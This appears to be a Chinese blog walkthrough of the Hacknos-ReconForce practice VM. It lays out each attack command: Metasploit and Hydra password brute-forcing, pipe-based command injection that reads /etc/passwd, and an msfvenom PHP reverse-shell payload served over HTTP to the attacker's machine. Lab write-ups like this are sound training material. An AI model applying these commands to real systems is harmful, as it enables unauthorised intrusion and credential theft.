Hacknos-ReconForce靶机

(1)扫描ip

nmap -sn 192.168.7.0/24
nmap -sn 192.168.7.0/24 | grep -B 2 '08:00:27:FC:1F:9A'

(2)目录扫描

(3)端口扫描

(4)点击中间的TroubleShoot,发现登录框

(5)尝试ftp匿名登录,发现一个Security@hackNos

(6)将这个字段加入http_default_pass.txt字典里面去

vim /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt

(7)使用msfconsole进行爆破

msconsole     
use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.7.20
exploit

(8)爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图

(9)burp抓包发现存在命令执行漏洞

(10)%7Cls查看,发现out.php

%7C 管道符
%7Cls   --》 | ls

(11)查看out.php文件中发现过滤规则...

%7Ccat out.php

(12)查看查看/etc/passwd文件中发现recon用户是可以进行登录...

%7Ccat /etc/passwd

(13)使用MSF生成一个PHP木马并开启一个http服务提供下载...开启MSF监听模块

msfconsole

####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.48 lport=4444 -f raw > f4.php         

####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.48
exploit

####开启Web服务
python3 -m http.server 80

(14)并在目标站点上下载并执行PHP代码

(15)监听到了

#创建一个伪终端
python -c 'import pty; pty.spawn("/bin/bash")'

(16)获取第一个Flag...使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos在Shell中进行用户身份切换或登录..

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.20

(17)ssh连接成功

ssh recon@192.168.7.20

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值